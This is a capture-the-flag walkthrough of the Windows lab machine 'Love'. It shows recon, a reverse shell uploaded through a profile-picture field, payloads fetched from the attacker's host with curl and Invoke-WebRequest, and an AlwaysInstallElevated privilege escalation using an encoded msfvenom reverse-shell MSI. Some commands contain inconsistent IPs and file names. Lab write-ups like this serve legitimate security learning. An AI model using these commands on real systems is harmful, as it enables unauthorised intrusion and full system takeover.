by “Spread love”
Table of Contents
About Love
Love is rated as an Easy windows box released on 5/1/2021. This is a box that relies on CVE’s and basic reconnaissance to root.
Machine Info
The Machine IP is 10.129.103.90. It has a multitude of ports open. Interesting ones include http, smb, and http over an interesting port.
Recon
Interestingly, we see the common name in the SSL Certificate. Lets add it to /etc/hosts
Now with the latest boxes, we should probably attempt to visit this staging.love.htb and see what comes up
Pretty cool. Lets go to the Demo and see what it gives us:
Nice.
I tried to upload a reverse shell but did not have any success… lets go back to the nmap scan.
If you’ll notice.. there is an interesting http port (5000)
Lets scan this port and see if we get anything
Nice! Now if we visit the original IP we see a voting login form. I scanned this with dirbuster and got an Admin subdomain returned
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u <ip>
From here, I was able to use these credentials and login as an administator. Very nice.
Intrusion
From here, we clearly have administrator access. But still don’t have a shell and not much we can do here except create candidates, ballot positions, election titles, etc.
This will prove to be useful and I knew exactly what to do thanks to the tryhackme box Mr. Robot. You can generate a msfvenom php reverse shell, upload it to the candidate profile picture, and set up a listener to get a connection back
Awesome! We can grab User.txt
Privesc
The privesc for this is a fun one and pretty straight forward
Enum
We start off with winpeas.EXE. But how do we get it on the target?
Powershell or Curl can help us here
Invoke-WebRequest “http://10.10.XX.XX:8000/shell.exe” -OutFile shell.exe
10.10.14.138
Now let us grab winpeas
whoami /priv
This didnt reveal much, so we find winpeas on our local machine and serve it on python -m SimpleHTTPServer 8080
Invoke-WebRequest “http://10.10.14.138:8080/winPEAS.exe” -OutFile shell.exe
curl -o winPEASE.bat “http://10.10.14.138:8080/winPEAS.bat
Further Privesc
we can list our privileges with whoami /priv
Always Installed
Always installed is came up with winPEAS.
What is AlwaysInstalled?
Windows environments provide a group policy settings which allow a regular user to install a Microsoft Windows Installer Package (MSI) with system privileges. This can be discovered in environments where a standard users wants to install an application which requires system privileges and the administrator would like to avoid to give temporary local administrator access to a user.
From the security point of view this can be abused by an attacker in order to escalate his privileges to the box to SYSTEM.
AlwaysInstallElevated is a functionality that offers all users(especially low-privileged user) on a windows machine to run any MSI file with elevated privileges. MSI is a Microsoft based installer package file format which is used for installing storing and removing of a program.
We can use msfvenom to generate the msi
msfvenom –platform windows –arch x64 –payload windows/x64/shell_reverse_tcp LHOST=10.0.2.4 LPORT=1337 –encoder x64/xor –iterations 9 –format msi –out AlwaysInstallElevated.msi
Now serve this with python -m SimpleHTTPServer 8080
We can use curl from the victim machine to get it curl -o myFilewer.msi http://10.10.14.138:8080/AlwaysInstallElevated.msi
Exploit
Then we can run this file on our system with
msiexec /quiet /qn /i myFilewer.msi
and set up a nc port on 1337
And boom! We have rooted the machine!
